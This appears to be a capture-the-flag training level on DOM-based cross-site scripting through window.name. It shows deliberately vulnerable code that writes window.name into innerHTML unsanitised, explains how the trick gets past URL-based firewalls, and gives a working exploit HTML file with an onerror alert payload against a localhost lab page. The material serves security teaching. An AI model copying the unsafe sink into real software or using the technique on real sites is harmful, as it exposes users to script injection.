Level 9: DOM Smuggling via window.name
MISSION: The application reads data from window.name. Because window.name persists across navigation, you must write an external HTML exploit that sets its own window.name and then redirects to this page.
No cached theme detected in window.name.
/// SOURCE CODE INSPECTOR ///
// Client-Side DOM Logic
// The application checks the window.name property for a cached session state.
// window.name persists across domains and cross-origin redirects!
window.onload = () => {
let cachedState = window.name;
if (cachedState && cachedState.includes("theme_")) {
// Flaw: Renders the un-sanitized window.name directly to the DOM
document.getElementById('theme-box').innerHTML = "Loaded theme: " + cachedState;
}
};/// DECRYPTION COMPLETE ///
The window.name property persists across different domains in the same tab. An attacker can set a malicious window.name on their own site, and then redirect the victim to the vulnerable application, bypassing URL-based WAFs entirely.
Exploit HTML File:
<script>window.name = "theme_<img src=x onerror=alert(1)>";
window.location = "http://localhost:3000/level9";
</script>